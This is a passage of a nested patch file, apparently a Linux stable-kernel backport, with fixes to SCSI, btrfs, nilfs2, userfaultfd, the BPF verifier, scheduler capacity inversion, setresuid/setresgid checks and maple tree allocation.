+-#define TCS_SLEW_MASK		(0x3 < 3)
++#define TCS_SLEW_MASK		GENMASK(4, 3)
+ 
+ enum fan53555_vendor {
+ 	FAN53526_VENDOR_FAIRCHILD = 0,
+diff --git a/drivers/scsi/megaraid/megaraid_sas_base.c b/drivers/scsi/megaraid/megaraid_sas_base.c
+index d265a2d9d0824..13ee8e4c4f570 100644
+--- a/drivers/scsi/megaraid/megaraid_sas_base.c
++++ b/drivers/scsi/megaraid/megaraid_sas_base.c
+@@ -3299,7 +3299,7 @@ fw_crash_buffer_show(struct device *cdev,
+ 
+ 	spin_lock_irqsave(&instance->crashdump_lock, flags);
+ 	buff_offset = instance->fw_crash_buffer_offset;
+-	if (!instance->crash_dump_buf &&
++	if (!instance->crash_dump_buf ||
+ 		!((instance->fw_crash_state == AVAILABLE) ||
+ 		(instance->fw_crash_state == COPYING))) {
+ 		dev_err(&instance->pdev->dev,
+diff --git a/drivers/scsi/scsi.c b/drivers/scsi/scsi.c
+index 24c4c92543599..3cda5d26b66ca 100644
+--- a/drivers/scsi/scsi.c
++++ b/drivers/scsi/scsi.c
+@@ -314,11 +314,18 @@ static int scsi_vpd_inquiry(struct scsi_device *sdev, unsigned char *buffer,
+ 	if (result)
+ 		return -EIO;
+ 
+-	/* Sanity check that we got the page back that we asked for */
++	/*
++	 * Sanity check that we got the page back that we asked for and that
++	 * the page size is not 0.
++	 */
+ 	if (buffer[1] != page)
+ 		return -EIO;
+ 
+-	return get_unaligned_be16(&buffer[2]) + 4;
++	result = get_unaligned_be16(&buffer[2]);
++	if (!result)
++		return -EIO;
++
++	return result + 4;
+ }
+ 
+ static int scsi_get_vpd_size(struct scsi_device *sdev, u8 page)
+diff --git a/drivers/spi/spi-rockchip-sfc.c b/drivers/spi/spi-rockchip-sfc.c
+index bd87d3c92dd33..69347b6bf60cd 100644
+--- a/drivers/spi/spi-rockchip-sfc.c
++++ b/drivers/spi/spi-rockchip-sfc.c
+@@ -632,7 +632,7 @@ static int rockchip_sfc_probe(struct platform_device *pdev)
+ 	if (ret) {
+ 		dev_err(dev, "Failed to request irq\n");
+ 
+-		return ret;
++		goto err_irq;
+ 	}
+ 
+ 	ret = rockchip_sfc_init(sfc);
+diff --git a/fs/btrfs/extent_map.c b/fs/btrfs/extent_map.c
+index b8ae02aa632e3..4abbe4b352533 100644
+--- a/fs/btrfs/extent_map.c
++++ b/fs/btrfs/extent_map.c
+@@ -523,7 +523,7 @@ void replace_extent_mapping(struct extent_map_tree *tree,
+ 	setup_extent_mapping(tree, new, modified);
+ }
+ 
+-static struct extent_map *next_extent_map(struct extent_map *em)
++static struct extent_map *next_extent_map(const struct extent_map *em)
+ {
+ 	struct rb_node *next;
+ 
+@@ -533,6 +533,35 @@ static struct extent_map *next_extent_map(struct extent_map *em)
+ 	return container_of(next, struct extent_map, rb_node);
+ }
+ 
++/*
++ * Get the extent map that immediately follows another one.
++ *
++ * @tree:       The extent map tree that the extent map belong to.
++ *              Holding read or write access on the tree's lock is required.
++ * @em:         An extent map from the given tree. The caller must ensure that
++ *              between getting @em and between calling this function, the
++ *              extent map @em is not removed from the tree - for example, by
++ *              holding the tree's lock for the duration of those 2 operations.
++ *
++ * Returns the extent map that immediately follows @em, or NULL if @em is the
++ * last extent map in the tree.
++ */
++struct extent_map *btrfs_next_extent_map(const struct extent_map_tree *tree,
++					 const struct extent_map *em)
++{
++	struct extent_map *next;
++
++	/* The lock must be acquired either in read mode or write mode. */
++	lockdep_assert_held(&tree->lock);
++	ASSERT(extent_map_in_tree(em));
++
++	next = next_extent_map(em);
++	if (next)
++		refcount_inc(&next->refs);
++
++	return next;
++}
++
+ static struct extent_map *prev_extent_map(struct extent_map *em)
+ {
+ 	struct rb_node *prev;
+diff --git a/fs/btrfs/extent_map.h b/fs/btrfs/extent_map.h
+index ad311864272a0..68d3f2c9ea1d8 100644
+--- a/fs/btrfs/extent_map.h
++++ b/fs/btrfs/extent_map.h
+@@ -87,6 +87,8 @@ static inline u64 extent_map_block_end(struct extent_map *em)
+ void extent_map_tree_init(struct extent_map_tree *tree);
+ struct extent_map *lookup_extent_mapping(struct extent_map_tree *tree,
+ 					 u64 start, u64 len);
++struct extent_map *btrfs_next_extent_map(const struct extent_map_tree *tree,
++					 const struct extent_map *em);
+ int add_extent_mapping(struct extent_map_tree *tree,
+ 		       struct extent_map *em, int modified);
+ void remove_extent_mapping(struct extent_map_tree *tree, struct extent_map *em);
+diff --git a/fs/btrfs/file.c b/fs/btrfs/file.c
+index 1bda59c683602..77202addead83 100644
+--- a/fs/btrfs/file.c
++++ b/fs/btrfs/file.c
+@@ -3248,40 +3248,50 @@ static bool find_delalloc_subrange(struct btrfs_inode *inode, u64 start, u64 end
+ 	 */
+ 	read_lock(&em_tree->lock);
+ 	em = lookup_extent_mapping(em_tree, start, len);
+-	read_unlock(&em_tree->lock);
++	if (!em) {
++		read_unlock(&em_tree->lock);
++		return (delalloc_len > 0);
++	}
+ 
+ 	/* extent_map_end() returns a non-inclusive end offset. */
+-	em_end = em ? extent_map_end(em) : 0;
++	em_end = extent_map_end(em);
+ 
+ 	/*
+ 	 * If we have a hole/prealloc extent map, check the next one if this one
+ 	 * ends before our range's end.
+ 	 */
+-	if (em && (em->block_start == EXTENT_MAP_HOLE ||
+-		   test_bit(EXTENT_FLAG_PREALLOC, &em->flags)) && em_end < end) {
++	if ((em->block_start == EXTENT_MAP_HOLE ||
++	     test_bit(EXTENT_FLAG_PREALLOC, &em->flags)) && em_end < end) {
+ 		struct extent_map *next_em;
+ 
+-		read_lock(&em_tree->lock);
+-		next_em = lookup_extent_mapping(em_tree, em_end, len - em_end);
+-		read_unlock(&em_tree->lock);
+-
++		next_em = btrfs_next_extent_map(em_tree, em);
+ 		free_extent_map(em);
+-		em_end = next_em ? extent_map_end(next_em) : 0;
++
++		/*
++		 * There's no next extent map or the next one starts beyond our
++		 * range, return the range found in the io tree (if any).
++		 */
++		if (!next_em || next_em->start > end) {
++			read_unlock(&em_tree->lock);
++			free_extent_map(next_em);
++			return (delalloc_len > 0);
++		}
++
++		em_end = extent_map_end(next_em);
+ 		em = next_em;
+ 	}
+ 
+-	if (em && (em->block_start == EXTENT_MAP_HOLE ||
+-		   test_bit(EXTENT_FLAG_PREALLOC, &em->flags))) {
+-		free_extent_map(em);
+-		em = NULL;
+-	}
++	read_unlock(&em_tree->lock);
+ 
+ 	/*
+-	 * No extent map or one for a hole or prealloc extent. Use the delalloc
+-	 * range we found in the io tree if we have one.
++	 * We have a hole or prealloc extent that ends at or beyond our range's
++	 * end, return the range found in the io tree (if any).
+ 	 */
+-	if (!em)
++	if (em->block_start == EXTENT_MAP_HOLE ||
++	    test_bit(EXTENT_FLAG_PREALLOC, &em->flags)) {
++		free_extent_map(em);
+ 		return (delalloc_len > 0);
++	}
+ 
+ 	/*
+ 	 * We don't have any range as EXTENT_DELALLOC in the io tree, so the
+diff --git a/fs/fs-writeback.c b/fs/fs-writeback.c
+index 9958d40207712..aa33c39be1829 100644
+--- a/fs/fs-writeback.c
++++ b/fs/fs-writeback.c
+@@ -974,6 +974,16 @@ restart:
+ 			continue;
+ 		}
+ 
++		/*
++		 * If wb_tryget fails, the wb has been shutdown, skip it.
++		 *
++		 * Pin @wb so that it stays on @bdi->wb_list.  This allows
++		 * continuing iteration from @wb after dropping and
++		 * regrabbing rcu read lock.
++		 */
++		if (!wb_tryget(wb))
++			continue;
++
+ 		/* alloc failed, execute synchronously using on-stack fallback */
+ 		work = &fallback_work;
+ 		*work = *base_work;
+@@ -982,13 +992,6 @@ restart:
+ 		work->done = &fallback_work_done;
+ 
+ 		wb_queue_work(wb, work);
+-
+-		/*
+-		 * Pin @wb so that it stays on @bdi->wb_list.  This allows
+-		 * continuing iteration from @wb after dropping and
+-		 * regrabbing rcu read lock.
+-		 */
+-		wb_get(wb);
+ 		last_wb = wb;
+ 
+ 		rcu_read_unlock();
+diff --git a/fs/fuse/dir.c b/fs/fuse/dir.c
+index bb97a384dc5dd..904673a4f6902 100644
+--- a/fs/fuse/dir.c
++++ b/fs/fuse/dir.c
+@@ -214,7 +214,7 @@ static int fuse_dentry_revalidate(struct dentry *entry, unsigned int flags)
+ 	if (inode && fuse_is_bad(inode))
+ 		goto invalid;
+ 	else if (time_before64(fuse_dentry_time(entry), get_jiffies_64()) ||
+-		 (flags & (LOOKUP_EXCL | LOOKUP_REVAL))) {
++		 (flags & (LOOKUP_EXCL | LOOKUP_REVAL | LOOKUP_RENAME_TARGET))) {
+ 		struct fuse_entry_out outarg;
+ 		FUSE_ARGS(args);
+ 		struct fuse_forget_link *forget;
+diff --git a/fs/nilfs2/segment.c b/fs/nilfs2/segment.c
+index 63d96a1733b2a..101f2ce6ba376 100644
+--- a/fs/nilfs2/segment.c
++++ b/fs/nilfs2/segment.c
+@@ -430,6 +430,23 @@ static int nilfs_segctor_reset_segment_buffer(struct nilfs_sc_info *sci)
+ 	return 0;
+ }
+ 
++/**
++ * nilfs_segctor_zeropad_segsum - zero pad the rest of the segment summary area
++ * @sci: segment constructor object
++ *
++ * nilfs_segctor_zeropad_segsum() zero-fills unallocated space at the end of
++ * the current segment summary block.
++ */
++static void nilfs_segctor_zeropad_segsum(struct nilfs_sc_info *sci)
++{
++	struct nilfs_segsum_pointer *ssp;
++
++	ssp = sci->sc_blk_cnt > 0 ? &sci->sc_binfo_ptr : &sci->sc_finfo_ptr;
++	if (ssp->offset < ssp->bh->b_size)
++		memset(ssp->bh->b_data + ssp->offset, 0,
++		       ssp->bh->b_size - ssp->offset);
++}
++
+ static int nilfs_segctor_feed_segment(struct nilfs_sc_info *sci)
+ {
+ 	sci->sc_nblk_this_inc += sci->sc_curseg->sb_sum.nblocks;
+@@ -438,6 +455,7 @@ static int nilfs_segctor_feed_segment(struct nilfs_sc_info *sci)
+ 				* The current segment is filled up
+ 				* (internal code)
+ 				*/
++	nilfs_segctor_zeropad_segsum(sci);
+ 	sci->sc_curseg = NILFS_NEXT_SEGBUF(sci->sc_curseg);
+ 	return nilfs_segctor_reset_segment_buffer(sci);
+ }
+@@ -542,6 +560,7 @@ static int nilfs_segctor_add_file_block(struct nilfs_sc_info *sci,
+ 		goto retry;
+ 	}
+ 	if (unlikely(required)) {
++		nilfs_segctor_zeropad_segsum(sci);
+ 		err = nilfs_segbuf_extend_segsum(segbuf);
+ 		if (unlikely(err))
+ 			goto failed;
+@@ -1531,6 +1550,7 @@ static int nilfs_segctor_collect(struct nilfs_sc_info *sci,
+ 		nadd = min_t(int, nadd << 1, SC_MAX_SEGDELTA);
+ 		sci->sc_stage = prev_stage;
+ 	}
++	nilfs_segctor_zeropad_segsum(sci);
+ 	nilfs_segctor_truncate_segments(sci, sci->sc_curseg, nilfs->ns_sufile);
+ 	return 0;
+ 
+diff --git a/fs/userfaultfd.c b/fs/userfaultfd.c
+index cc694846617a5..154c103eca751 100644
+--- a/fs/userfaultfd.c
++++ b/fs/userfaultfd.c
+@@ -1966,8 +1966,10 @@ static int userfaultfd_api(struct userfaultfd_ctx *ctx,
+ 	ret = -EFAULT;
+ 	if (copy_from_user(&uffdio_api, buf, sizeof(uffdio_api)))
+ 		goto out;
+-	/* Ignore unsupported features (userspace built against newer kernel) */
+-	features = uffdio_api.features & UFFD_API_FEATURES;
++	features = uffdio_api.features;
++	ret = -EINVAL;
++	if (uffdio_api.api != UFFD_API || (features & ~UFFD_API_FEATURES))
++		goto err_out;
+ 	ret = -EPERM;
+ 	if ((features & UFFD_FEATURE_EVENT_FORK) && !capable(CAP_SYS_PTRACE))
+ 		goto err_out;
+diff --git a/include/linux/kmsan.h b/include/linux/kmsan.h
+index e38ae3c346184..30b17647ce3c7 100644
+--- a/include/linux/kmsan.h
++++ b/include/linux/kmsan.h
+@@ -134,11 +134,12 @@ void kmsan_kfree_large(const void *ptr);
+  * @page_shift:	page_shift passed to vmap_range_noflush().
+  *
+  * KMSAN maps shadow and origin pages of @pages into contiguous ranges in
+- * vmalloc metadata address range.
++ * vmalloc metadata address range. Returns 0 on success, callers must check
++ * for non-zero return value.
+  */
+-void kmsan_vmap_pages_range_noflush(unsigned long start, unsigned long end,
+-				    pgprot_t prot, struct page **pages,
+-				    unsigned int page_shift);
++int kmsan_vmap_pages_range_noflush(unsigned long start, unsigned long end,
++				   pgprot_t prot, struct page **pages,
++				   unsigned int page_shift);
+ 
+ /**
+  * kmsan_vunmap_kernel_range_noflush() - Notify KMSAN about a vunmap.
+@@ -159,11 +160,12 @@ void kmsan_vunmap_range_noflush(unsigned long start, unsigned long end);
+  * @page_shift:	page_shift argument passed to vmap_range_noflush().
+  *
+  * KMSAN creates new metadata pages for the physical pages mapped into the
+- * virtual memory.
++ * virtual memory. Returns 0 on success, callers must check for non-zero return
++ * value.
+  */
+-void kmsan_ioremap_page_range(unsigned long addr, unsigned long end,
+-			      phys_addr_t phys_addr, pgprot_t prot,
+-			      unsigned int page_shift);
++int kmsan_ioremap_page_range(unsigned long addr, unsigned long end,
++			     phys_addr_t phys_addr, pgprot_t prot,
++			     unsigned int page_shift);
+ 
+ /**
+  * kmsan_iounmap_page_range() - Notify KMSAN about a iounmap_page_range() call.
+@@ -281,12 +283,13 @@ static inline void kmsan_kfree_large(const void *ptr)
+ {
+ }
+ 
+-static inline void kmsan_vmap_pages_range_noflush(unsigned long start,
+-						  unsigned long end,
+-						  pgprot_t prot,
+-						  struct page **pages,
+-						  unsigned int page_shift)
++static inline int kmsan_vmap_pages_range_noflush(unsigned long start,
++						 unsigned long end,
++						 pgprot_t prot,
++						 struct page **pages,
++						 unsigned int page_shift)
+ {
++	return 0;
+ }
+ 
+ static inline void kmsan_vunmap_range_noflush(unsigned long start,
+@@ -294,12 +297,12 @@ static inline void kmsan_vunmap_range_noflush(unsigned long start,
+ {
+ }
+ 
+-static inline void kmsan_ioremap_page_range(unsigned long start,
+-					    unsigned long end,
+-					    phys_addr_t phys_addr,
+-					    pgprot_t prot,
+-					    unsigned int page_shift)
++static inline int kmsan_ioremap_page_range(unsigned long start,
++					   unsigned long end,
++					   phys_addr_t phys_addr, pgprot_t prot,
++					   unsigned int page_shift)
+ {
++	return 0;
+ }
+ 
+ static inline void kmsan_iounmap_page_range(unsigned long start,
+diff --git a/include/linux/skbuff.h b/include/linux/skbuff.h
+index 7be5bb4c94b6d..20ca1613f2e3e 100644
+--- a/include/linux/skbuff.h
++++ b/include/linux/skbuff.h
+@@ -291,6 +291,7 @@ struct nf_bridge_info {
+ 	u8			pkt_otherhost:1;
+ 	u8			in_prerouting:1;
+ 	u8			bridged_dnat:1;
++	u8			sabotage_in_done:1;
+ 	__u16			frag_max_size;
+ 	struct net_device	*physindev;
+ 
+@@ -4684,7 +4685,7 @@ static inline void nf_reset_ct(struct sk_buff *skb)
+ 
+ static inline void nf_reset_trace(struct sk_buff *skb)
+ {
+-#if IS_ENABLED(CONFIG_NETFILTER_XT_TARGET_TRACE) || defined(CONFIG_NF_TABLES)
++#if IS_ENABLED(CONFIG_NETFILTER_XT_TARGET_TRACE) || IS_ENABLED(CONFIG_NF_TABLES)
+ 	skb->nf_trace = 0;
+ #endif
+ }
+@@ -4704,7 +4705,7 @@ static inline void __nf_copy(struct sk_buff *dst, const struct sk_buff *src,
+ 	dst->_nfct = src->_nfct;
+ 	nf_conntrack_get(skb_nfct(src));
+ #endif
+-#if IS_ENABLED(CONFIG_NETFILTER_XT_TARGET_TRACE) || defined(CONFIG_NF_TABLES)
++#if IS_ENABLED(CONFIG_NETFILTER_XT_TARGET_TRACE) || IS_ENABLED(CONFIG_NF_TABLES)
+ 	if (copy)
+ 		dst->nf_trace = src->nf_trace;
+ #endif
+diff --git a/include/net/netfilter/nf_tables.h b/include/net/netfilter/nf_tables.h
+index 1daededfa75ed..6bacbf57ac175 100644
+--- a/include/net/netfilter/nf_tables.h
++++ b/include/net/netfilter/nf_tables.h
+@@ -1078,6 +1078,10 @@ struct nft_chain {
+ };
+ 
+ int nft_chain_validate(const struct nft_ctx *ctx, const struct nft_chain *chain);
++int nft_setelem_validate(const struct nft_ctx *ctx, struct nft_set *set,
++			 const struct nft_set_iter *iter,
++			 struct nft_set_elem *elem);
++int nft_set_catchall_validate(const struct nft_ctx *ctx, struct nft_set *set);
+ 
+ enum nft_chain_types {
+ 	NFT_CHAIN_T_DEFAULT = 0,
+diff --git a/include/trace/events/f2fs.h b/include/trace/events/f2fs.h
+index e57f867191ef1..eb53e96b7a29c 100644
+--- a/include/trace/events/f2fs.h
++++ b/include/trace/events/f2fs.h
+@@ -505,7 +505,7 @@ TRACE_EVENT(f2fs_truncate_partial_nodes,
+ 	TP_STRUCT__entry(
+ 		__field(dev_t,	dev)
+ 		__field(ino_t,	ino)
+-		__field(nid_t,	nid[3])
++		__array(nid_t,	nid, 3)
+ 		__field(int,	depth)
+ 		__field(int,	err)
+ 	),
+diff --git a/init/Kconfig b/init/Kconfig
+index 0c214af99085d..2028ed4d50f5b 100644
+--- a/init/Kconfig
++++ b/init/Kconfig
+@@ -892,18 +892,14 @@ config CC_IMPLICIT_FALLTHROUGH
+ 	default "-Wimplicit-fallthrough=5" if CC_IS_GCC && $(cc-option,-Wimplicit-fallthrough=5)
+ 	default "-Wimplicit-fallthrough" if CC_IS_CLANG && $(cc-option,-Wunreachable-code-fallthrough)
+ 
+-# Currently, disable gcc-11,12 array-bounds globally.
+-# We may want to target only particular configurations some day.
++# Currently, disable gcc-11+ array-bounds globally.
++# It's still broken in gcc-13, so no upper bound yet.
+ config GCC11_NO_ARRAY_BOUNDS
+ 	def_bool y
+ 
+-config GCC12_NO_ARRAY_BOUNDS
+-	def_bool y
+-
+ config CC_NO_ARRAY_BOUNDS
+ 	bool
+-	default y if CC_IS_GCC && GCC_VERSION >= 110000 && GCC_VERSION < 120000 && GCC11_NO_ARRAY_BOUNDS
+-	default y if CC_IS_GCC && GCC_VERSION >= 120000 && GCC_VERSION < 130000 && GCC12_NO_ARRAY_BOUNDS
++	default y if CC_IS_GCC && GCC_VERSION >= 110000 && GCC11_NO_ARRAY_BOUNDS
+ 
+ #
+ # For architectures that know their GCC __int128 support is sound
+diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
+index ea21e008bf856..8db2ed564939b 100644
+--- a/kernel/bpf/verifier.c
++++ b/kernel/bpf/verifier.c
+@@ -2682,6 +2682,21 @@ static int backtrack_insn(struct bpf_verifier_env *env, int idx,
+ 			}
+ 		} else if (opcode == BPF_EXIT) {
+ 			return -ENOTSUPP;
++		} else if (BPF_SRC(insn->code) == BPF_X) {
++			if (!(*reg_mask & (dreg | sreg)))
++				return 0;
++			/* dreg <cond> sreg
++			 * Both dreg and sreg need precision before
++			 * this insn. If only sreg was marked precise
++			 * before it would be equally necessary to
++			 * propagate it to dreg.
++			 */
++			*reg_mask |= (sreg | dreg);
++			 /* else dreg <cond> K
++			  * Only dreg still needs precision before
++			  * this insn, so for the K-based conditional
++			  * there is nothing new to be marked.
++			  */
+ 		}
+ 	} else if (class == BPF_LD) {
+ 		if (!(*reg_mask & dreg))
+diff --git a/kernel/sched/fair.c b/kernel/sched/fair.c
+index ec2d913280e6a..f70c4a7fb4ef3 100644
+--- a/kernel/sched/fair.c
++++ b/kernel/sched/fair.c
+@@ -4465,12 +4465,16 @@ static inline int util_fits_cpu(unsigned long util,
+ 	 * For uclamp_max, we can tolerate a drop in performance level as the
+ 	 * goal is to cap the task. So it's okay if it's getting less.
+ 	 *
+-	 * In case of capacity inversion, which is not handled yet, we should
+-	 * honour the inverted capacity for both uclamp_min and uclamp_max all
+-	 * the time.
++	 * In case of capacity inversion we should honour the inverted capacity
++	 * for both uclamp_min and uclamp_max all the time.
+ 	 */
+-	capacity_orig = capacity_orig_of(cpu);
+-	capacity_orig_thermal = capacity_orig - arch_scale_thermal_pressure(cpu);
++	capacity_orig = cpu_in_capacity_inversion(cpu);
++	if (capacity_orig) {
++		capacity_orig_thermal = capacity_orig;
++	} else {
++		capacity_orig = capacity_orig_of(cpu);
++		capacity_orig_thermal = capacity_orig - arch_scale_thermal_pressure(cpu);
++	}
+ 
+ 	/*
+ 	 * We want to force a task to fit a cpu as implied by uclamp_max.
+@@ -8866,16 +8870,82 @@ static unsigned long scale_rt_capacity(int cpu)
+ 
+ static void update_cpu_capacity(struct sched_domain *sd, int cpu)
+ {
++	unsigned long capacity_orig = arch_scale_cpu_capacity(cpu);
+ 	unsigned long capacity = scale_rt_capacity(cpu);
+ 	struct sched_group *sdg = sd->groups;
++	struct rq *rq = cpu_rq(cpu);
+ 
+-	cpu_rq(cpu)->cpu_capacity_orig = arch_scale_cpu_capacity(cpu);
++	rq->cpu_capacity_orig = capacity_orig;
+ 
+ 	if (!capacity)
+ 		capacity = 1;
+ 
+-	cpu_rq(cpu)->cpu_capacity = capacity;
+-	trace_sched_cpu_capacity_tp(cpu_rq(cpu));
++	rq->cpu_capacity = capacity;
++
++	/*
++	 * Detect if the performance domain is in capacity inversion state.
++	 *
++	 * Capacity inversion happens when another perf domain with equal or
++	 * lower capacity_orig_of() ends up having higher capacity than this
++	 * domain after subtracting thermal pressure.
++	 *
++	 * We only take into account thermal pressure in this detection as it's
++	 * the only metric that actually results in *real* reduction of
++	 * capacity due to performance points (OPPs) being dropped/become
++	 * unreachable due to thermal throttling.
++	 *
++	 * We assume:
++	 *   * That all cpus in a perf domain have the same capacity_orig
++	 *     (same uArch).
++	 *   * Thermal pressure will impact all cpus in this perf domain
++	 *     equally.
++	 */
++	if (sched_energy_enabled()) {
++		unsigned long inv_cap = capacity_orig - thermal_load_avg(rq);
++		struct perf_domain *pd;
++
++		rcu_read_lock();
++
++		pd = rcu_dereference(rq->rd->pd);
++		rq->cpu_capacity_inverted = 0;
++
++		for (; pd; pd = pd->next) {
++			struct cpumask *pd_span = perf_domain_span(pd);
++			unsigned long pd_cap_orig, pd_cap;
++
++			/* We can't be inverted against our own pd */
++			if (cpumask_test_cpu(cpu_of(rq), pd_span))
++				continue;
++
++			cpu = cpumask_any(pd_span);
++			pd_cap_orig = arch_scale_cpu_capacity(cpu);
++
++			if (capacity_orig < pd_cap_orig)
++				continue;
++
++			/*
++			 * handle the case of multiple perf domains have the
++			 * same capacity_orig but one of them is under higher
++			 * thermal pressure. We record it as capacity
++			 * inversion.
++			 */
++			if (capacity_orig == pd_cap_orig) {
++				pd_cap = pd_cap_orig - thermal_load_avg(cpu_rq(cpu));
++
++				if (pd_cap > inv_cap) {
++					rq->cpu_capacity_inverted = inv_cap;
++					break;
++				}
++			} else if (pd_cap_orig > inv_cap) {
++				rq->cpu_capacity_inverted = inv_cap;
++				break;
++			}
++		}
++
++		rcu_read_unlock();
++	}
++
++	trace_sched_cpu_capacity_tp(rq);
+ 
+ 	sdg->sgc->capacity = capacity;
+ 	sdg->sgc->min_capacity = capacity;
+diff --git a/kernel/sched/sched.h b/kernel/sched/sched.h
+index d6d488e8eb554..5f18460f62f0f 100644
+--- a/kernel/sched/sched.h
++++ b/kernel/sched/sched.h
+@@ -1041,6 +1041,7 @@ struct rq {
+ 
+ 	unsigned long		cpu_capacity;
+ 	unsigned long		cpu_capacity_orig;
++	unsigned long		cpu_capacity_inverted;
+ 
+ 	struct balance_callback *balance_callback;
+ 
+@@ -2878,6 +2879,24 @@ static inline unsigned long capacity_orig_of(int cpu)
+ 	return cpu_rq(cpu)->cpu_capacity_orig;
+ }
+ 
++/*
++ * Returns inverted capacity if the CPU is in capacity inversion state.
++ * 0 otherwise.
++ *
++ * Capacity inversion detection only considers thermal impact where actual
++ * performance points (OPPs) gets dropped.
++ *
++ * Capacity inversion state happens when another performance domain that has
++ * equal or lower capacity_orig_of() becomes effectively larger than the perf
++ * domain this CPU belongs to due to thermal pressure throttling it hard.
++ *
++ * See comment in update_cpu_capacity().
++ */
++static inline unsigned long cpu_in_capacity_inversion(int cpu)
++{
++	return cpu_rq(cpu)->cpu_capacity_inverted;
++}
++
+ /**
+  * enum cpu_util_type - CPU utilization type
+  * @FREQUENCY_UTIL:	Utilization used to select frequency
+diff --git a/kernel/sys.c b/kernel/sys.c
+index 88b31f096fb2d..c85e1abf7b7c7 100644
+--- a/kernel/sys.c
++++ b/kernel/sys.c
+@@ -664,6 +664,7 @@ long __sys_setresuid(uid_t ruid, uid_t euid, uid_t suid)
+ 	struct cred *new;
+ 	int retval;
+ 	kuid_t kruid, keuid, ksuid;
++	bool ruid_new, euid_new, suid_new;
+ 
+ 	kruid = make_kuid(ns, ruid);
+ 	keuid = make_kuid(ns, euid);
+@@ -678,25 +679,29 @@ long __sys_setresuid(uid_t ruid, uid_t euid, uid_t suid)
+ 	if ((suid != (uid_t) -1) && !uid_valid(ksuid))
+ 		return -EINVAL;
+ 
++	old = current_cred();
++
++	/* check for no-op */
++	if ((ruid == (uid_t) -1 || uid_eq(kruid, old->uid)) &&
++	    (euid == (uid_t) -1 || (uid_eq(keuid, old->euid) &&
++				    uid_eq(keuid, old->fsuid))) &&
++	    (suid == (uid_t) -1 || uid_eq(ksuid, old->suid)))
++		return 0;
++
++	ruid_new = ruid != (uid_t) -1        && !uid_eq(kruid, old->uid) &&
++		   !uid_eq(kruid, old->euid) && !uid_eq(kruid, old->suid);
++	euid_new = euid != (uid_t) -1        && !uid_eq(keuid, old->uid) &&
++		   !uid_eq(keuid, old->euid) && !uid_eq(keuid, old->suid);
++	suid_new = suid != (uid_t) -1        && !uid_eq(ksuid, old->uid) &&
++		   !uid_eq(ksuid, old->euid) && !uid_eq(ksuid, old->suid);
++	if ((ruid_new || euid_new || suid_new) &&
++	    !ns_capable_setid(old->user_ns, CAP_SETUID))
++		return -EPERM;
++
+ 	new = prepare_creds();
+ 	if (!new)
+ 		return -ENOMEM;
+ 
+-	old = current_cred();
+-
+-	retval = -EPERM;
+-	if (!ns_capable_setid(old->user_ns, CAP_SETUID)) {
+-		if (ruid != (uid_t) -1        && !uid_eq(kruid, old->uid) &&
+-		    !uid_eq(kruid, old->euid) && !uid_eq(kruid, old->suid))
+-			goto error;
+-		if (euid != (uid_t) -1        && !uid_eq(keuid, old->uid) &&
+-		    !uid_eq(keuid, old->euid) && !uid_eq(keuid, old->suid))
+-			goto error;
+-		if (suid != (uid_t) -1        && !uid_eq(ksuid, old->uid) &&
+-		    !uid_eq(ksuid, old->euid) && !uid_eq(ksuid, old->suid))
+-			goto error;
+-	}
+-
+ 	if (ruid != (uid_t) -1) {
+ 		new->uid = kruid;
+ 		if (!uid_eq(kruid, old->uid)) {
+@@ -761,6 +766,7 @@ long __sys_setresgid(gid_t rgid, gid_t egid, gid_t sgid)
+ 	struct cred *new;
+ 	int retval;
+ 	kgid_t krgid, kegid, ksgid;
++	bool rgid_new, egid_new, sgid_new;
+ 
+ 	krgid = make_kgid(ns, rgid);
+ 	kegid = make_kgid(ns, egid);
+@@ -773,23 +779,28 @@ long __sys_setresgid(gid_t rgid, gid_t egid, gid_t sgid)
+ 	if ((sgid != (gid_t) -1) && !gid_valid(ksgid))
+ 		return -EINVAL;
+ 
++	old = current_cred();
++
++	/* check for no-op */
++	if ((rgid == (gid_t) -1 || gid_eq(krgid, old->gid)) &&
++	    (egid == (gid_t) -1 || (gid_eq(kegid, old->egid) &&
++				    gid_eq(kegid, old->fsgid))) &&
++	    (sgid == (gid_t) -1 || gid_eq(ksgid, old->sgid)))
++		return 0;
++
++	rgid_new = rgid != (gid_t) -1        && !gid_eq(krgid, old->gid) &&
++		   !gid_eq(krgid, old->egid) && !gid_eq(krgid, old->sgid);
++	egid_new = egid != (gid_t) -1        && !gid_eq(kegid, old->gid) &&
++		   !gid_eq(kegid, old->egid) && !gid_eq(kegid, old->sgid);
++	sgid_new = sgid != (gid_t) -1        && !gid_eq(ksgid, old->gid) &&
++		   !gid_eq(ksgid, old->egid) && !gid_eq(ksgid, old->sgid);
++	if ((rgid_new || egid_new || sgid_new) &&
++	    !ns_capable_setid(old->user_ns, CAP_SETGID))
++		return -EPERM;
++
+ 	new = prepare_creds();
+ 	if (!new)
+ 		return -ENOMEM;
+-	old = current_cred();
+-
+-	retval = -EPERM;
+-	if (!ns_capable_setid(old->user_ns, CAP_SETGID)) {
+-		if (rgid != (gid_t) -1        && !gid_eq(krgid, old->gid) &&
+-		    !gid_eq(krgid, old->egid) && !gid_eq(krgid, old->sgid))
+-			goto error;
+-		if (egid != (gid_t) -1        && !gid_eq(kegid, old->gid) &&
+-		    !gid_eq(kegid, old->egid) && !gid_eq(kegid, old->sgid))
+-			goto error;
+-		if (sgid != (gid_t) -1        && !gid_eq(ksgid, old->gid) &&
+-		    !gid_eq(ksgid, old->egid) && !gid_eq(ksgid, old->sgid))
+-			goto error;
+-	}
+ 
+ 	if (rgid != (gid_t) -1)
+ 		new->gid = krgid;
+diff --git a/lib/maple_tree.c b/lib/maple_tree.c
+index 39f34ea7a9be5..9fe25ce9937b8 100644
+--- a/lib/maple_tree.c
++++ b/lib/maple_tree.c
+@@ -1293,26 +1293,21 @@ static inline void mas_alloc_nodes(struct ma_state *mas, gfp_t gfp)
+ 	node = mas->alloc;
+ 	node->request_count = 0;
+ 	while (requested) {
+-		max_req = MAPLE_ALLOC_SLOTS;
+-		if (node->node_count) {
+-			unsigned int offset = node->node_count;
+-
+-			slots = (void **)&node->slot[offset];
+-			max_req -= offset;
+-		} else {
+-			slots = (void **)&node->slot;
+-		}
+-
++		max_req = MAPLE_ALLOC_SLOTS - node->node_count;
++		slots = (void **)&node->slot[node->node_count];
+ 		max_req = min(requested, max_req);
+ 		count = mt_alloc_bulk(gfp, max_req, slots);
+ 		if (!count)
+ 			goto nomem_bulk;
+ 
++		if (node->node_count == 0) {
++			node->slot[0]->node_count = 0;
++			node->slot[0]->request_count = 0;
++		}
++
+ 		node->node_count += count;
+ 		allocated += count;
